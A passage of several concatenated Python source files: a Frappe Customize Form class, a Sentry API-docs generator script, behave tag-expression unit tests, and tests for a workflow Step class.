'default': 'Text',
'precision': 'Select',
'read_only': 'Check',
'length': 'Int',
'columns': 'Int',
'remember_last_selected_value': 'Check',
'allow_bulk_edit': 'Check',
}
allowed_fieldtype_change = (('Currency', 'Float', 'Percent'), ('Small Text', 'Data'),
('Text', 'Data'), ('Text', 'Text Editor', 'Code', 'Signature'), ('Data', 'Select'),
('Text', 'Small Text'))
allowed_fieldtype_for_options_change = ('Read Only', 'HTML', 'Select',)
class CustomizeForm(Document):
def on_update(self):
frappe.db.sql("delete from tabSingles where doctype='Customize Form'")
frappe.db.sql("delete from `tabCustomize Form Field`")
def fetch_to_customize(self):
self.clear_existing_doc()
if not self.doc_type:
return
meta = frappe.get_meta(self.doc_type)
# doctype properties
for property in doctype_properties:
self.set(property, meta.get(property))
for d in meta.get("fields"):
new_d = {"fieldname": d.fieldname, "is_custom_field": d.get("is_custom_field"), "name": d.name}
for property in docfield_properties:
new_d[property] = d.get(property)
self.append("fields", new_d)
# load custom translation
translation = self.get_name_translation()
self.label = translation.target_name if translation else ''
# NOTE doc is sent to clientside by run_method
def get_name_translation(self):
'''Get translation object if exists of current doctype name in the default language'''
return frappe.get_value('Translation',
{'source_name': self.doc_type, 'language': frappe.local.lang or 'en'},
['name', 'target_name'], as_dict=True)
def set_name_translation(self):
'''Create, update custom translation for this doctype'''
current = self.get_name_translation()
if current:
if self.label and current!=self.label:
frappe.db.set_value('Translation', current.name, 'target_name', self.label)
frappe.translate.clear_cache()
else:
# clear translation
frappe.delete_doc('Translation', current.name)
else:
if self.label:
frappe.get_doc(dict(doctype='Translation',
source_name=self.doc_type,
target_name=self.label,
language_code=frappe.local.lang or 'en')).insert()
def clear_existing_doc(self):
doc_type = self.doc_type
for fieldname in self.meta.get_valid_columns():
self.set(fieldname, None)
for df in self.meta.get_table_fields():
self.set(df.fieldname, [])
self.doc_type = doc_type
self.name = "Customize Form"
def save_customization(self):
if not self.doc_type:
return
self.flags.update_db = False
self.set_property_setters()
self.update_custom_fields()
self.set_name_translation()
validate_fields_for_doctype(self.doc_type)
if self.flags.update_db:
from frappe.model.db_schema import updatedb
updatedb(self.doc_type)
if not hasattr(self, 'hide_success') or not self.hide_success:
frappe.msgprint(_("{0} updated").format(_(self.doc_type)))
frappe.clear_cache(doctype=self.doc_type)
self.fetch_to_customize()
def set_property_setters(self):
meta = frappe.get_meta(self.doc_type)
# doctype property setters
for property in doctype_properties:
if self.get(property) != meta.get(property):
self.make_property_setter(property=property, value=self.get(property),
property_type=doctype_properties[property])
for df in self.get("fields"):
if df.get("__islocal"):
continue
meta_df = meta.get("fields", {"fieldname": df.fieldname})
if not meta_df or meta_df[0].get("is_custom_field"):
continue
for property in docfield_properties:
if property != "idx" and df.get(property) != meta_df[0].get(property):
if property == "fieldtype":
self.validate_fieldtype_change(df, meta_df[0].get(property), df.get(property))
elif property == "allow_on_submit" and df.get(property):
frappe.msgprint(_("Row {0}: Not allowed to enable Allow on Submit for standard fields")\
.format(df.idx))
continue
elif property == "in_list_view" and df.get(property) \
and df.fieldtype!="Attach Image" and df.fieldtype in no_value_fields:
frappe.msgprint(_("'In List View' not allowed for type {0} in row {1}")
.format(df.fieldtype, df.idx))
continue
elif property == "precision" and cint(df.get("precision")) > 6 \
and cint(df.get("precision")) > cint(meta_df[0].get("precision")):
self.flags.update_db = True
elif property == "unique":
self.flags.update_db = True
elif (property == "read_only" and cint(df.get("read_only"))==0
and frappe.db.get_value("DocField", {"parent": self.doc_type, "fieldname": df.fieldname}, "read_only")==1):
# if docfield has read_only checked and user is trying to make it editable, don't allow it
frappe.msgprint(_("You cannot unset 'Read Only' for field {0}").format(df.label))
continue
elif property == "options" and df.get("fieldtype") not in allowed_fieldtype_for_options_change:
frappe.msgprint(_("You can't set 'Options' for field {0}").format(df.label))
continue
self.make_property_setter(property=property, value=df.get(property),
property_type=docfield_properties[property], fieldname=df.fieldname)
def update_custom_fields(self):
for i, df in enumerate(self.get("fields")):
if df.get("is_custom_field"):
if not frappe.db.exists('Custom Field', {'dt': self.doc_type, 'fieldname': df.fieldname}):
self.add_custom_field(df, i)
self.flags.update_db = True
else:
self.update_in_custom_field(df, i)
self.delete_custom_fields()
def add_custom_field(self, df, i):
d = frappe.new_doc("Custom Field")
d.dt = self.doc_type
for property in docfield_properties:
d.set(property, df.get(property))
if i!=0:
d.insert_after = self.fields[i-1].fieldname
d.idx = i
d.insert()
df.fieldname = d.fieldname
def update_in_custom_field(self, df, i):
meta = frappe.get_meta(self.doc_type)
meta_df = meta.get("fields", {"fieldname": df.fieldname})
if not (meta_df and meta_df[0].get("is_custom_field")):
# not a custom field
return
custom_field = frappe.get_doc("Custom Field", meta_df[0].name)
changed = False
for property in docfield_properties:
if df.get(property) != custom_field.get(property):
if property == "fieldtype":
self.validate_fieldtype_change(df, meta_df[0].get(property), df.get(property))
custom_field.set(property, df.get(property))
changed = True
# check and update `insert_after` property
if i!=0:
insert_after = self.fields[i-1].fieldname
if custom_field.insert_after != insert_after:
custom_field.insert_after = insert_after
custom_field.idx = i
changed = True
if changed:
custom_field.db_update()
self.flags.update_db = True
#custom_field.save()
def delete_custom_fields(self):
meta = frappe.get_meta(self.doc_type)
fields_to_remove = (set([df.fieldname for df in meta.get("fields")])
- set(df.fieldname for df in self.get("fields")))
for fieldname in fields_to_remove:
df = meta.get("fields", {"fieldname": fieldname})[0]
if df.get("is_custom_field"):
frappe.delete_doc("Custom Field", df.name)
def make_property_setter(self, property, value, property_type, fieldname=None):
self.delete_existing_property_setter(property, fieldname)
property_value = self.get_existing_property_value(property, fieldname)
if property_value==value:
return
# create a new property setter
# ignore validation becuase it will be done at end
frappe.make_property_setter({
"doctype": self.doc_type,
"doctype_or_field": "DocField" if fieldname else "DocType",
"fieldname": fieldname,
"property": property,
"value": value,
"property_type": property_type
}, ignore_validate=True)
def delete_existing_property_setter(self, property, fieldname=None):
# first delete existing property setter
existing_property_setter = frappe.db.get_value("Property Setter", {"doc_type": self.doc_type,
"property": property, "field_name['']": fieldname or ''})
if existing_property_setter:
frappe.db.sql("delete from `tabProperty Setter` where name=%s", existing_property_setter)
def get_existing_property_value(self, property_name, fieldname=None):
# check if there is any need to make property setter!
if fieldname:
property_value = frappe.db.get_value("DocField", {"parent": self.doc_type,
"fieldname": fieldname}, property_name)
else:
try:
property_value = frappe.db.get_value("DocType", self.doc_type, property_name)
except Exception as e:
if e.args[0]==1054:
property_value = None
else:
raise
return property_value
def validate_fieldtype_change(self, df, old_value, new_value):
allowed = False
for allowed_changes in allowed_fieldtype_change:
if (old_value in allowed_changes and new_value in allowed_changes):
allowed = True
break
if not allowed:
frappe.throw(_("Fieldtype cannot be changed from {0} to {1} in row {2}").format(old_value, new_value, df.idx))
def reset_to_defaults(self):
if not self.doc_type:
return
frappe.db.sql("""delete from `tabProperty Setter` where doc_type=%s
and ifnull(field_name, '')!='naming_series'""", self.doc_type)
frappe.clear_cache(doctype=self.doc_type)
self.fetch_to_customize()
|
|
import os
import zlib
import json
import click
import urlparse
import logging
from datetime import datetime
from subprocess import Popen, PIPE
from contextlib import contextmanager
HERE = os.path.abspath(os.path.dirname(__file__))
SENTRY_CONFIG = os.path.join(HERE, 'sentry.conf.py')
# No sentry or django imports before that point
from sentry.utils import runner
runner.configure(config_path=SENTRY_CONFIG, skip_backend_validation=True)
from django.conf import settings
# Fair game from here
from django.core.management import call_command
from sentry.utils.apidocs import Runner, MockUtils, iter_scenarios, \
iter_endpoints, get_sections
OUTPUT_PATH = os.path.join(HERE, 'cache')
HOST = urlparse.urlparse(settings.SENTRY_URL_PREFIX).netloc
# We don't care about you, go away
_logger = logging.getLogger('sentry.events')
_logger.disabled = True
def color_for_string(s):
colors = ('red', 'green', 'yellow', 'blue', 'cyan', 'magenta')
return colors[zlib.crc32(s) % len(colors)]
def report(category, message, fg=None):
if fg is None:
fg = color_for_string(category)
click.echo('[%s] %s: %s' % (
str(datetime.utcnow()).split('.')[0],
click.style(category, fg=fg),
message
))
def launch_redis():
report('redis', 'Launching redis server')
cl = Popen(['redis-server', '-'], stdin=PIPE, stdout=open(os.devnull, 'r+'))
cl.stdin.write('''
port %(port)s
databases %(databases)d
save ""
''' % {
'port': str(settings.SENTRY_APIDOCS_REDIS_PORT),
'databases': 4,
})
cl.stdin.flush()
cl.stdin.close()
return cl
def spawn_sentry():
report('sentry', 'Launching sentry server')
cl = Popen(['sentry', '--config=' + SENTRY_CONFIG, 'runserver',
'-v', '0', '--noreload', '--nothreading',
'--no-watchers', '--traceback',
'127.0.0.1:%s' % settings.SENTRY_APIDOCS_WEB_PORT])
return cl
@contextmanager
def management_connection():
from sqlite3 import connect
cfg = settings.DATABASES['default']
con = connect(cfg['NAME'])
try:
con.cursor()
yield con
finally:
con.close()
def init_db():
drop_db()
report('db', 'Migrating database (this can time some time)')
call_command('syncdb', migrate=True, interactive=False,
traceback=True, verbosity=0)
def drop_db():
report('db', 'Dropping database')
try:
os.remove(settings.DATABASES['default']['NAME'])
except (OSError, IOError):
pass
class SentryBox(object):
def __init__(self):
self.redis = None
self.sentry = None
self.task_runner = None
def __enter__(self):
self.redis = launch_redis()
self.sentry = spawn_sentry()
init_db()
return self
def __exit__(self, exc_type, exc_value, tb):
drop_db()
if self.redis is not None:
report('redis', 'Stopping redis server')
self.redis.kill()
self.redis.wait()
if self.sentry is not None:
report('sentry', 'Shutting down sentry server')
self.sentry.kill()
self.sentry.wait()
def dump_json(path, data):
path = os.path.join(OUTPUT_PATH, path)
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
with open(path, 'w') as f:
for line in json.dumps(data, indent=2, sort_keys=True).splitlines():
f.write(line.rstrip() + '\n')
def run_scenario(vars, scenario_ident, func):
runner = Runner(scenario_ident, func, **vars)
report('scenario', 'Running scenario "%s"' % scenario_ident)
func(runner)
dump_json('scenarios/%s.json' % scenario_ident, runner.to_json())
@click.command()
@click.option('--output-path', type=click.Path())
def cli(output_path):
"""API docs dummy generator."""
global OUTPUT_PATH
if output_path is not None:
OUTPUT_PATH = os.path.abspath(output_path)
with SentryBox():
utils = MockUtils()
report('org', 'Creating user and organization')
user = utils.create_user('[email protected]')
org = utils.create_org('The Interstellar Jurisdiction',
owner=user)
api_key = utils.create_api_key(org)
report('org', 'Creating team')
team = utils.create_team('Powerful Abolitionist',
org=org)
projects = []
for project_name in 'Pump Station', 'Prime Mover':
report('project', 'Creating project "%s"' % project_name)
project = utils.create_project(project_name, team=team, org=org)
release = utils.create_release(project=project, user=user)
report('event', 'Creating event for "%s"' % project_name)
event1 = utils.create_event(project=project, release=release,
platform='python')
event2 = utils.create_event(project=project, release=release,
platform='java')
projects.append({
'project': project,
'release': release,
'events': [event1, event2],
})
vars = {
'org': org,
'api_key': api_key,
'me': user,
'api_key': api_key,
'teams': [{
'team': team,
'projects': projects,
}],
}
for scenario_ident, func in iter_scenarios():
run_scenario(vars, scenario_ident, func)
section_mapping = {}
report('docs', 'Exporting endpoint documentation')
for endpoint in iter_endpoints():
report('endpoint', 'Exporting docs for "%s"' %
endpoint['endpoint_name'])
section_mapping.setdefault(endpoint['section'], []) \
.append((endpoint['endpoint_name'],
endpoint['title']))
dump_json('endpoints/%s.json' % endpoint['endpoint_name'], endpoint)
report('docs', 'Exporting sections')
dump_json('sections.json', {
'sections': dict((section, {
'title': title,
'entries': dict(section_mapping.get(section, ())),
}) for section, title in get_sections().iteritems())
})
if __name__ == '__main__':
cli()
|
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from behave.tag_expression import TagExpression
import pytest
import unittest
# ----------------------------------------------------------------------------
# BASIC TESTS: 0..1 tags, not @tag
# ----------------------------------------------------------------------------
class TestTagExpressionNoTags(unittest.TestCase):
def setUp(self):
self.e = TagExpression([])
def test_should_match_empty_tags(self):
assert self.e.check([])
def test_should_match_foo(self):
assert self.e.check(['foo'])
class TestTagExpressionFoo(unittest.TestCase):
def setUp(self):
self.e = TagExpression(['foo'])
def test_should_not_match_no_tags(self):
assert not self.e.check([])
def test_should_match_foo(self):
assert self.e.check(['foo'])
def test_should_not_match_bar(self):
assert not self.e.check(['bar'])
class TestTagExpressionNotFoo(unittest.TestCase):
def setUp(self):
self.e = TagExpression(['-foo'])
def test_should_match_no_tags(self):
assert self.e.check([])
def test_should_not_match_foo(self):
assert not self.e.check(['foo'])
def test_should_match_bar(self):
assert self.e.check(['bar'])
# ----------------------------------------------------------------------------
# LOGICAL-AND TESTS: With @foo, @bar (2 tags)
# ----------------------------------------------------------------------------
class TestTagExpressionFooAndBar(unittest.TestCase):
# -- LOGIC: @foo and @bar
def setUp(self):
self.e = TagExpression(['foo', 'bar'])
def test_should_not_match_no_tags(self):
assert not self.e.check([])
def test_should_not_match_foo(self):
assert not self.e.check(['foo'])
def test_should_not_match_bar(self):
assert not self.e.check(['bar'])
def test_should_not_match_other(self):
assert not self.e.check(['other'])
def test_should_match_foo_bar(self):
assert self.e.check(['foo', 'bar'])
assert self.e.check(['bar', 'foo'])
def test_should_not_match_foo_other(self):
assert not self.e.check(['foo', 'other'])
assert not self.e.check(['other', 'foo'])
def test_should_not_match_bar_other(self):
assert not self.e.check(['bar', 'other'])
assert not self.e.check(['other', 'bar'])
def test_should_not_match_zap_other(self):
assert not self.e.check(['zap', 'other'])
assert not self.e.check(['other', 'zap'])
def test_should_match_foo_bar_other(self):
assert self.e.check(['foo', 'bar', 'other'])
assert self.e.check(['bar', 'other', 'foo'])
assert self.e.check(['other', 'bar', 'foo'])
def test_should_not_match_foo_zap_other(self):
assert not self.e.check(['foo', 'zap', 'other'])
assert not self.e.check(['other', 'zap', 'foo'])
def test_should_not_match_bar_zap_other(self):
assert not self.e.check(['bar', 'zap', 'other'])
assert not self.e.check(['other', 'bar', 'zap'])
def test_should_not_match_zap_baz_other(self):
assert not self.e.check(['zap', 'baz', 'other'])
assert not self.e.check(['baz', 'other', 'baz'])
assert not self.e.check(['other', 'baz', 'zap'])
class TestTagExpressionFooAndNotBar(unittest.TestCase):
# -- LOGIC: @foo and not @bar
def setUp(self):
self.e = TagExpression(['foo', '-bar'])
def test_should_not_match_no_tags(self):
assert not self.e.check([])
def test_should_match_foo(self):
assert self.e.check(['foo'])
def test_should_not_match_bar(self):
assert not self.e.check(['bar'])
def test_should_not_match_other(self):
assert not self.e.check(['other'])
def test_should_not_match_foo_bar(self):
assert not self.e.check(['foo', 'bar'])
assert not self.e.check(['bar', 'foo'])
def test_should_match_foo_other(self):
assert self.e.check(['foo', 'other'])
assert self.e.check(['other', 'foo'])
def test_should_not_match_bar_other(self):
assert not self.e.check(['bar', 'other'])
assert not self.e.check(['other', 'bar'])
def test_should_not_match_zap_other(self):
assert not self.e.check(['bar', 'other'])
assert not self.e.check(['other', 'bar'])
def test_should_not_match_foo_bar_other(self):
assert not self.e.check(['foo', 'bar', 'other'])
assert not self.e.check(['bar', 'other', 'foo'])
assert not self.e.check(['other', 'bar', 'foo'])
def test_should_match_foo_zap_other(self):
assert self.e.check(['foo', 'zap', 'other'])
assert self.e.check(['other', 'zap', 'foo'])
def test_should_not_match_bar_zap_other(self):
assert not self.e.check(['bar', 'zap', 'other'])
assert not self.e.check(['other', 'bar', 'zap'])
def test_should_not_match_zap_baz_other(self):
assert not self.e.check(['zap', 'baz', 'other'])
assert not self.e.check(['baz', 'other', 'baz'])
assert not self.e.check(['other', 'baz', 'zap'])
class TestTagExpressionNotBarAndFoo(TestTagExpressionFooAndNotBar):
# -- REUSE: Test suite due to symmetry in reversed expression
# LOGIC: not @bar and @foo == @foo and not @bar
def setUp(self):
self.e = TagExpression(['-bar', 'foo'])
class TestTagExpressionNotFooAndNotBar(unittest.TestCase):
# -- LOGIC: not @bar and not @foo
def setUp(self):
self.e = TagExpression(['-foo', '-bar'])
def test_should_match_no_tags(self):
assert self.e.check([])
def test_should_not_match_foo(self):
assert not self.e.check(['foo'])
def test_should_not_match_bar(self):
assert not self.e.check(['bar'])
def test_should_match_other(self):
assert self.e.check(['other'])
def test_should_not_match_foo_bar(self):
assert not self.e.check(['foo', 'bar'])
assert not self.e.check(['bar', 'foo'])
def test_should_not_match_foo_other(self):
assert not self.e.check(['foo', 'other'])
assert not self.e.check(['other', 'foo'])
def test_should_not_match_bar_other(self):
assert not self.e.check(['bar', 'other'])
assert not self.e.check(['other', 'bar'])
def test_should_match_zap_other(self):
assert self.e.check(['zap', 'other'])
assert self.e.check(['other', 'zap'])
def test_should_not_match_foo_bar_other(self):
assert not self.e.check(['foo', 'bar', 'other'])
assert not self.e.check(['bar', 'other', 'foo'])
assert not self.e.check(['other', 'bar', 'foo'])
def test_should_not_match_foo_zap_other(self):
assert not self.e.check(['foo', 'zap', 'other'])
assert not self.e.check(['other', 'zap', 'foo'])
def test_should_not_match_bar_zap_other(self):
assert not self.e.check(['bar', 'zap', 'other'])
assert not self.e.check(['other', 'bar', 'zap'])
def test_should_match_zap_baz_other(self):
assert self.e.check(['zap', 'baz', 'other'])
assert self.e.check(['baz', 'other', 'baz'])
assert self.e.check(['other', 'baz', 'zap'])
class TestTagExpressionNotBarAndNotFoo(TestTagExpressionNotFooAndNotBar):
# -- REUSE: Test suite due to symmetry in reversed expression
# LOGIC: not @bar and not @foo == not @foo and not @bar
def setUp(self):
self.e = TagExpression(['-bar', '-foo'])
# ----------------------------------------------------------------------------
# LOGICAL-OR TESTS: With @foo, @bar (2 tags)
# ----------------------------------------------------------------------------
class TestTagExpressionFooOrBar(unittest.TestCase):
def setUp(self):
self.e = TagExpression(['foo,bar'])
def test_should_not_match_no_tags(self):
assert not self.e.check([])
def test_should_match_foo(self):
assert self.e.check(['foo'])
def test_should_match_bar(self):
assert self.e.check(['bar'])
def test_should_not_match_other(self):
assert not self.e.check(['other'])
def test_should_match_foo_bar(self):
assert self.e.check(['foo', 'bar'])
assert self.e.check(['bar', 'foo'])
def test_should_match_foo_other(self):
assert self.e.check(['foo', 'other'])
assert self.e.check(['other', 'foo'])
def test_should_match_bar_other(self):
assert self.e.check(['bar', 'other'])
assert self.e.check(['other', 'bar'])
def test_should_not_match_zap_other(self):
assert not self.e.check(['zap', 'other'])
assert not self.e.check(['other', 'zap'])
def test_should_match_foo_bar_other(self):
assert self.e.check(['foo', 'bar', 'other'])
assert self.e.check(['bar', 'other', 'foo'])
assert self.e.check(['other', 'bar', 'foo'])
def test_should_match_foo_zap_other(self):
assert self.e.check(['foo', 'zap', 'other'])
assert self.e.check(['other', 'zap', 'foo'])
def test_should_match_bar_zap_other(self):
assert self.e.check(['bar', 'zap', 'other'])
assert self.e.check(['other', 'bar', 'zap'])
def test_should_not_match_zap_baz_other(self):
assert not self.e.check(['zap', 'baz', 'other'])
assert not self.e.check(['baz', 'other', 'baz'])
assert not self.e.check(['other', 'baz', 'zap'])
class TestTagExpressionBarOrFoo(TestTagExpressionFooOrBar):
# -- REUSE: Test suite due to symmetry in reversed expression
# LOGIC: @bar or @foo == @foo or @bar
def setUp(self):
self.e = TagExpression(['bar,foo'])
class TestTagExpressionFooOrNotBar(unittest.TestCase):
def setUp(self):
self.e = TagExpression(['foo,-bar'])
def test_should_match_no_tags(self):
assert self.e.check([])
def test_should_match_foo(self):
assert self.e.check(['foo'])
def test_should_not_match_bar(self):
assert not self.e.check(['bar'])
def test_should_match_other(self):
assert self.e.check(['other'])
def test_should_match_foo_bar(self):
assert self.e.check(['foo', 'bar'])
assert self.e.check(['bar', 'foo'])
def test_should_match_foo_other(self):
assert self.e.check(['foo', 'other'])
assert self.e.check(['other', 'foo'])
def test_should_not_match_bar_other(self):
assert not self.e.check(['bar', 'other'])
assert not self.e.check(['other', 'bar'])
def test_should_match_zap_other(self):
assert self.e.check(['zap', 'other'])
assert self.e.check(['other', 'zap'])
def test_should_match_foo_bar_other(self):
assert self.e.check(['foo', 'bar', 'other'])
assert self.e.check(['bar', 'other', 'foo'])
assert self.e.check(['other', 'bar', 'foo'])
def test_should_match_foo_zap_other(self):
assert self.e.check(['foo', 'zap', 'other'])
assert self.e.check(['other', 'zap', 'foo'])
def test_should_not_match_bar_zap_other(self):
assert not self.e.check(['bar', 'zap', 'other'])
assert not self.e.check(['other', 'bar', 'zap'])
def test_should_match_zap_baz_other(self):
assert self.e.check(['zap', 'baz', 'other'])
assert self.e.check(['baz', 'other', 'baz'])
assert self.e.check(['other', 'baz', 'zap'])
class TestTagExpressionNotBarOrFoo(TestTagExpressionFooOrNotBar):
# -- REUSE: Test suite due to symmetry in reversed expression
# LOGIC: not @bar or @foo == @foo or not @bar
def setUp(self):
self.e = TagExpression(['-bar,foo'])
class TestTagExpressionNotFooOrNotBar(unittest.TestCase):
def setUp(self):
self.e = TagExpression(['-foo,-bar'])
def test_should_match_no_tags(self):
assert self.e.check([])
def test_should_match_foo(self):
assert self.e.check(['foo'])
def test_should_match_bar(self):
assert self.e.check(['bar'])
def test_should_match_other(self):
assert self.e.check(['other'])
def test_should_not_match_foo_bar(self):
assert not self.e.check(['foo', 'bar'])
assert not self.e.check(['bar', 'foo'])
def test_should_match_foo_other(self):
assert self.e.check(['foo', 'other'])
assert self.e.check(['other', 'foo'])
def test_should_match_bar_other(self):
assert self.e.check(['bar', 'other'])
assert self.e.check(['other', 'bar'])
def test_should_match_zap_other(self):
assert self.e.check(['zap', 'other'])
assert self.e.check(['other', 'zap'])
def test_should_not_match_foo_bar_other(self):
assert not self.e.check(['foo', 'bar', 'other'])
assert not self.e.check(['bar', 'other', 'foo'])
assert not self.e.check(['other', 'bar', 'foo'])
def test_should_match_foo_zap_other(self):
assert self.e.check(['foo', 'zap', 'other'])
assert self.e.check(['other', 'zap', 'foo'])
def test_should_match_bar_zap_other(self):
assert self.e.check(['bar', 'zap', 'other'])
assert self.e.check(['other', 'bar', 'zap'])
def test_should_match_zap_baz_other(self):
assert self.e.check(['zap', 'baz', 'other'])
assert self.e.check(['baz', 'other', 'baz'])
assert self.e.check(['other', 'baz', 'zap'])
class TestTagExpressionNotBarOrNotFoo(TestTagExpressionNotFooOrNotBar):
# -- REUSE: Test suite due to symmetry in reversed expression
# LOGIC: not @bar or @foo == @foo or not @bar
def setUp(self):
self.e = TagExpression(['-bar,-foo'])
# ----------------------------------------------------------------------------
# MORE TESTS: With 3 tags
# ----------------------------------------------------------------------------
class TestTagExpressionFooOrBarAndNotZap(unittest.TestCase):
def setUp(self):
self.e = TagExpression(['foo,bar', '-zap'])
def test_should_match_foo(self):
assert self.e.check(['foo'])
def test_should_not_match_foo_zap(self):
assert not self.e.check(['foo', 'zap'])
def test_should_not_match_tags(self):
assert not self.e.check([])
def test_should_match_foo(self):
assert self.e.check(['foo'])
def test_should_match_bar(self):
assert self.e.check(['bar'])
def test_should_not_match_other(self):
assert not self.e.check(['other'])
def test_should_match_foo_bar(self):
assert self.e.check(['foo', 'bar'])
assert self.e.check(['bar', 'foo'])
def test_should_match_foo_other(self):
assert self.e.check(['foo', 'other'])
assert self.e.check(['other', 'foo'])
def test_should_match_bar_other(self):
assert self.e.check(['bar', 'other'])
assert self.e.check(['other', 'bar'])
def test_should_not_match_zap_other(self):
assert not self.e.check(['zap', 'other'])
assert not self.e.check(['other', 'zap'])
def test_should_match_foo_bar_other(self):
assert self.e.check(['foo', 'bar', 'other'])
assert self.e.check(['bar', 'other', 'foo'])
assert self.e.check(['other', 'bar', 'foo'])
def test_should_not_match_foo_bar_zap(self):
assert not self.e.check(['foo', 'bar', 'zap'])
assert not self.e.check(['bar', 'zap', 'foo'])
assert not self.e.check(['zap', 'bar', 'foo'])
def test_should_not_match_foo_zap_other(self):
assert not self.e.check(['foo', 'zap', 'other'])
assert not self.e.check(['other', 'zap', 'foo'])
def test_should_not_match_bar_zap_other(self):
assert not self.e.check(['bar', 'zap', 'other'])
assert not self.e.check(['other', 'bar', 'zap'])
def test_should_not_match_zap_baz_other(self):
assert not self.e.check(['zap', 'baz', 'other'])
assert not self.e.check(['baz', 'other', 'baz'])
assert not self.e.check(['other', 'baz', 'zap'])
# ----------------------------------------------------------------------------
# TESTS WITH LIMIT
# ----------------------------------------------------------------------------
class TestTagExpressionFoo3OrNotBar4AndZap5(unittest.TestCase):
def setUp(self):
self.e = TagExpression(['foo:3,-bar', 'zap:5'])
def test_should_count_tags_for_positive_tags(self):
assert self.e.limits == {'foo': 3, 'zap': 5}
def test_should_match_foo_zap(self):
assert self.e.check(['foo', 'zap'])
class TestTagExpressionParsing(unittest.TestCase):
def setUp(self):
self.e = TagExpression([' foo:3 , -bar ', ' zap:5 '])
def test_should_have_limits(self):
assert self.e.limits == {'zap': 5, 'foo': 3}
class TestTagExpressionTagLimits(unittest.TestCase):
def test_should_be_counted_for_negative_tags(self):
e = TagExpression(['-todo:3'])
assert e.limits == {'todo': 3}
def test_should_be_counted_for_positive_tags(self):
e = TagExpression(['todo:3'])
assert e.limits == {'todo': 3}
def test_should_raise_an_error_for_inconsistent_limits(self):
with pytest.raises(Exception):
_ = TagExpression(['todo:3', '-todo:4'])
def test_should_allow_duplicate_consistent_limits(self):
e = TagExpression(['todo:3', '-todo:3'])
assert e.limits == {'todo': 3}
|
|
'''
Created on Feb 23, 2013
@author: nino
'''
import unittest
from mock import Mock, patch
from marx.workflow.step import Step, LogicUnit, ArgSpec, ResultSpec,\
ResultObject
import nose.tools
from tests.workflow.example_1 import run as run_example_1
from marx.workflow.context import DefaultContext
class Test(unittest.TestCase):
def test_call_context(self):
m = Mock()
m._accepts_context = True
ctx = DefaultContext()
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step(m)(ctx)
assert m.called
m.assert_called_once_with(context=ctx)
m.reset_mock()
with patch('inspect.getargspec') as argspec:
argspec.return_value = [['context']]
Step(m)(ctx)
assert m.called
m.assert_called_once_with(context=ctx)
def test_result_mapper_str(self):
m = Mock()
m.return_value = {'returned': 'bar'}
ctx = DefaultContext()
ctx.baz = None
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step(m, result_map={'baz': 'returned'})(ctx)
assert m.called
assert ctx.baz == 'bar'
def test_result_mapper_callable(self):
m = Mock()
m.return_value = {'returned': ['abc', 'bar']}
ctx = DefaultContext()
ctx.baz = None
def reverse_and_join(result, context): #@UnusedVariable
return "".join(result['returned'])[::-1]
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step(m, result_map={'baz': reverse_and_join})(ctx)
assert m.called
assert ctx.baz == 'rabcba'
def test_result_mapper_list(self):
m = Mock()
m.return_value = {'returned': {'bar': 1, 'boz': 2}}
ctx = DefaultContext()
ctx.baz = ctx.boz = None
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step(m, result_map={'baz': ('returned', 'bar'),
'boz': ('returned', 'boz')})(ctx)
assert m.called
print ctx.__dict__
assert ctx.baz == 1
assert ctx.boz == 2
def test_result_mapper_custom(self):
m = Mock()
m.return_value = {'returned': 'bar'}
m_rm = Mock()
ctx = DefaultContext()
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step(m, result_map=m_rm)(ctx)
assert m.called
assert m_rm.called
m_rm.assert_called_once_with(m.return_value, ctx)
def test_extra_kwargs(self):
m = Mock()
m._accepts_context = False
m.return_value = {'returned': 'bar'}
ctx = DefaultContext()
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step(m, extra_kwargs=dict(meow=True))(ctx)
assert m.called
m.assert_called_once_with(meow=True)
def test_arg_mapper(self):
m = Mock()
m._accepts_context = False
ctx = DefaultContext()
ctx.message = 1
ctx.meow = 1
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step(m, arg_map={'message': 'message'})(ctx)
Step(m, arg_map={'meow': 'message'})(ctx)
assert m.called
m.assert_any_call(message=1)
m.assert_any_call(meow=1)
def test_arg_mapper_custom(self):
m = Mock()
m._accepts_context = None
m_cm = Mock(return_value={'moo': True})
ctx = DefaultContext()
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step(m, arg_map=m_cm)(ctx)
assert m.called
m.assert_called_once_with(**m_cm.return_value)
def test_auto_map(self):
m_cm = Mock()
m_cm.moo = True
m_cm.meow = False
this = self
class Unit(LogicUnit):
def __call__(self, moo, meow, context):
this.success = (moo, meow, context)
Step(Unit(), arg_map=Unit.AutoMap())(m_cm)
assert this.success == (True, False, m_cm), this.success
def test_auto_map_override(self):
class Ctx:
moo = True
this = self
class Unit(LogicUnit):
def __call__(self, cow):
this.success = cow
Step(Unit(), arg_map=Unit.AutoMap({Unit.COW: 'moo'}))(Ctx())
assert this.success == (True), this.success
def test_auto_map_bad_field(self):
class Ctx:
cow = True
this = self
class Unit(LogicUnit):
def __call__(self, cow, pig):
this.success = cow, pig
nose.tools.assert_raises(AttributeError, Step(Unit(), arg_map=Unit.AutoMap()), Ctx()) # @UndefinedVariable
def test_auto_map_default(self):
class Ctx:
cow = True
this = self
class Unit(LogicUnit):
def __call__(self, cow, pig="not kosher"):
this.success = cow, pig
Step(Unit(), arg_map=Unit.AutoMap())(Ctx())
assert self.success == (True, "not kosher")
def test_callable_by_str(self):
ctx = DefaultContext()
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step('%s.a_callable' % __name__)(ctx)
assert a_callable.called
def test_results_declaration(self):
class Unit(LogicUnit):
meow = ArgSpec(bool, docs="The meow.")
the_cat_has_spoken = ResultSpec(bool, docs="Has the cat spoken?")
def __call__(self, meow):
self.result.the_cat_has_spoken = meow
test = Unit()
result = test(meow=True)
assert isinstance(result, ResultObject)
assert result['the_cat_has_spoken']
result = test(meow=False)
assert not result['the_cat_has_spoken']
def test_default_result_value(self):
class Unit(LogicUnit):
meow = ArgSpec(bool, docs="The meow.")
the_cat_has_spoken = ResultSpec(bool, default=True, docs="Has the cat spoken?")
def __call__(self, meow):
pass
test = Unit()
result = test(meow=True)
